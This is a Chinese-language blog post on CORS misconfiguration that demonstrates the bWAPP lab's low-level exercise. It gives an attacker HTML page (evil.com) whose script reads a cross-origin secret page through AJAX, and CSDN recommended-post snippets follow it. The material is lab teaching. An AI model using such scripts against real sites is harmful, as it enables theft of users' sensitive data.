关于那些Web漏洞--CORS

已于 2022-06-16 01:21:35 修改
阅读量318 收藏
点赞数
分类专栏: 漏洞原理 文章标签: web安全
于 2022-06-16 00:58:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shawdow_bug/article/details/125308091
版权

CORS

CORS(Cross-origin resource sharing),又称跨域资源共享。CORS的内容不叙述,可以阅读MDN文档。或者,阅读这篇文章:跨域资源共享 CORS 详解,同时还需要了解同源策略。CORS是一种实现ajax跨域加载资源的机制,如果CORS配置不当,就可能出现安全问题。是否存在安全问题,需要关注的响应头是:Access-Control-Allow-Origin,它确定了可以访问页面的来源。

BWAPP的CORS测试

low级别

1、主页面,点击 secret 跳转页面。

在这里插入图片描述2、假设这是用户的页面,攻击者的目的是盗取里面的sercet内容。查看请求这个页面时的HTTP响应头,从Access-Control-Allow-Origin头可以看出服务器配置了CORS," * "表示所有的源服务器都可以加载这个页面上的资源。既然如此,攻击者直接发送一个自己构造的页面链接(也许攻击者自己站点的一个页面)给用户,用户点击后,攻击页面使用ajax就可以直接读取另一个网站的敏感信息。

网站页面
HTTP响应头3、攻击页面:http://www.evil.com/test.html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
    <script>
        window.onload = function(){
            var xhr =new XMLHttpRequest();                     // 创建AJAX的对象
            // 设置使用的请求方式
            xhr.open('get','http://192.168.253.132/bwapp/bwapp/secret-cors-1.php' ,true); 
            xhr.send();                    // 发送请求

            xhr.onreadystatechange=function(){
                if(xhr.readyState === 4 ){    // 状态 4 表示服务器已响应
                    // 判断正常的响应结果的状态码
                    if(xhr.status >=200 && xhr.status<300 || xhr.status === 304){
                        console.log(xhr.responseText);          // 获取响应体内容
                    }else{
                        console.log('0');
                    }
                }
            }
        }
    </script>
</body>
</html>

4、用户点击这个链接,加载test.html页面,里面的js代码就会执行,然后向目标页面(要盗取数据的页面)发送请求,处理响应结果。可以看到,控制台输出的信息就是另一个网站的页面信息。这就说明了攻击者能窃取数据。

攻击者服务器上的页面

安全测试 之 常见安全漏洞CORS
Orange_hhh的博客
06-03 925
CORS:(Cross-origin resource sharing)跨域资源共享,CORS是一种机制,这种机制通过在http头部添加字段,通常情况下,web应用A告诉浏览器,自己有权限访问应用B。这样就可以解决跨源的问题了。
CORS跨域资源共享漏洞
m0_55772907的博客
10-19 1万+
cors漏洞
6、聊聊cors漏洞
划水的小白白
03-05 850
1、小结 1.1、存在漏洞的情况: 1.2、常见的cors设置(php举例) 2、漏洞复现 2.1、无需cookie 2.2、需要cookie 2.3、需要cookie的方式利用限制 3、补充与疑惑
CORS跨域漏洞
weixin_46627652的博客
04-20 5319
Web服务端CORS(跨域资源共享)错误配置,无法正确验证Origin头,任何网站都可以发出使用用户凭据发出的请求,并读取对这些请求的响应,信任任意来源可以有效地禁用同源策略,从而允许第三方网站进行双向交互,易导致敏感信息泄露。抓取上述漏洞地址的请求包,构造Origin字段,并将Origin头参数值设为恶意域名,服务端返回的Access-Control-Allow-Origin字段值为修改的恶意域名,判断服务端并未正确处理跨域请求。(1)如果没有必要就不要开启CORS。(2)严格限制域白名单,而不是使用*
程序安全漏洞
usa_washington的博客
09-18 452
程序安全
网络安全全栈培训笔记(54-WEB攻防-通用漏洞&跨域CORS资源&JSONP回调&域名接管劫持)
qq_46343633的博客
01-17 1182
1、子域名接管检测&探针&利用2、C0SP跨域资源检测&探针&利用3、JSONP跨域回调-检侧&探针&利用#前置知识点:同源策路限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制简单说就是浏览器的一种安全策略。虽然同源策路在安全方面起到了很好的防护作用,但也在一定程度上限制了一些前端功能的实现,所以就有了许多跨域的手段。子域名接管:域名解析记录指向域名,对应主机指向了一个当前未在使用或已经删除的特定服务,攻击。
检测Web漏洞:vuln-headers-extension Firefox扩展介绍
这个扩展能够识别和标记出多种常见的网络安全风险,包括但不限于CORS(跨源资源共享)配置错误、主机头注入漏洞、缺失的X-XSS-Protection安全头以及其他潜在的漏洞。该扩展的开发受到了网络安全研究者的重视,使用该...
cors漏洞
最新发布
03-08
### CORS漏洞原理 CORSCross-Origin Resource Sharing),即跨源资源共享,是由W3C制定的一项标准[^3]。这项技术允许Web应用通过在HTTP响应头中加入特定字段告知浏览器哪些外部域名可以访问当前站点资源。当一个...
理解同源(Same-Origin Policy)和跨域(CORS)
python_neophyte的博客
09-02 2215
写在前面 本文作为我这几天阅读相关文章的一个小结。 什么是浏览器的同源策略? 同源策略是浏览器的一种为了保护用户信息安全而制订的安全策略。 为什么要有同源保护? 既然是一种安全策略,那肯定是没有它的时候,会有安全问题,也就是说,没有它 = 不安全,有它 = 有了基本的安全保障,下面为了解释没有同源保护存在时可能出现的安全问题,先解释cookie。 什么是cookie? 学习web开发的朋友,或者cs从业人员肯定都知道cookie这个东西的存在。简单来说,它是用户的一个会员卡,就好像在现实生活中,去超市(超市
CORS-Anywhere节点服务器实现教程
资源摘要信息:"cors-server:实施cors-anywhere节点程序包的服务器" Node.js程序包"CORS任意服务器"是一个专为解决跨源资源共享(Cross-Origin Resource Sharing,简称CORS)问题而设计的解决方案。在Web开发中,当...
Apache配置文件httpd.conf
09-10
Apache服务器的本地配置是一件令人头疼的事,无法访问一般是由于配置文件的不正确导致的,这是一份可以在Mac系统中正常运行的配置文件。
APACHE【配置说明】
魔幻之翼的坚持
06-06 1577
Apache服务器的设置文件位于/usr/local/apache/conf/目录下,传统上使用三个配置文件httpd.conf,access.conf和srm.conf,来配置Apache服务器的行为。httpd.conf提供了最基本的服务器配置,是对守护程序httpd如何运行的技术描述;srm.conf是服务器的资源映射文件,告诉服务器各种文件的MIME类型,以及如何支持这些文件;access
apache各个配置文件的详细说明
雾隐雾现的至渝博客
06-17 5329
默认情况下,当处理一个请求并不需要访问文件内部的数据时(比如发送一个静态的文件内容),如果操作系统支持,Apache 将使用 sendfile 将文件内容直接发送到客户端而并不读取文件。包括:服务器池管理,多语言错误消息,动态目录列表形式配置,语言设置,用户家庭目录,请求和配置上的实时信息,虚拟主机,分布式认证和版本控制,Apache 默认设置,支持 HTML4/XHTML1 等。根据 MIMEMagicFile 文件的规则,Apache 通过检查文件开始的几个字节,来判定文件的 MIME 类型依据。
Cors漏洞详解
Askshhbs的博客
04-26 1万+
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
搭建并配置HTTPD文件服务及访问权限控制
川子的博客
05-03 3609
搭建并配置HTTPD文件服务及访问权限控制,安装HTTPD服务,修改配置信息,服务启动以及访问权限配置
【Linux】 Apache配置文件详解,颠覆认知
weixin_58085973的博客
04-16 548
Include conf.d/*.conf #读取/etc/httpd/conf/conf.d/目录中所有以.conf结尾的文件。31 ServerRoot “/etc/httpd” #apache配置文件的根目录。ServerRoot “/etc/httpd” #用于指定Apache运行的根目录。DocumentRoot “/var/www/html” #网页文件存放的目录。Include conf.d/*.conf #包含的子配置文件。42 Listen 80 #监听的端口。
Access-control-allow-origin:*并没有实际危害(更新)
热门推荐
balance的博客
04-23 6万+
一、网站一般在需要共享资源给其他网站时(跨域传递数据),才会设置access-control-allow-origin HTTP头。而跨域传递数据也可以使用jsonp方式 二、如果www.a.com域设置了access-control-allow-origin:* http头, 其他任何域包括www.b.com域的js就可以使用Ajax技术读取到​www.a.com域的数据 三、根据w3...
nginx 解决access-control-allow-origin CORS跨域安全访问问题及秘钥文件的配置
岳飞的博客
12-06 6132
 利用nginx实现https访问,同时添加秘钥和和防止跨站访问,这里我只修改了一些默认的参数, vi nginx.conf server { listen 443 default_server ssl; # 打开https的端口号,启用https的443端口 server_name www.a.com; # 服务器的...
CORS跨域-Nginx使用方法(Access-Control-Allow-Origin错误提示)
weixin_30918415的博客
11-26 1850
问题说明 当出现上图这个的时候,是访问请求外域URL无法访问,浏览器认为访问外域URL不安全,导致访问不了简称跨域问题。而这上面出现一句很重要的话“NO Access-Control-Allow-Origin”,这个是什么?是不是只要添加“Access-Control-Allow-Origin”头就能访问呢?如何添加?会不会有其他问题? Access-Control-Allow-Or...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值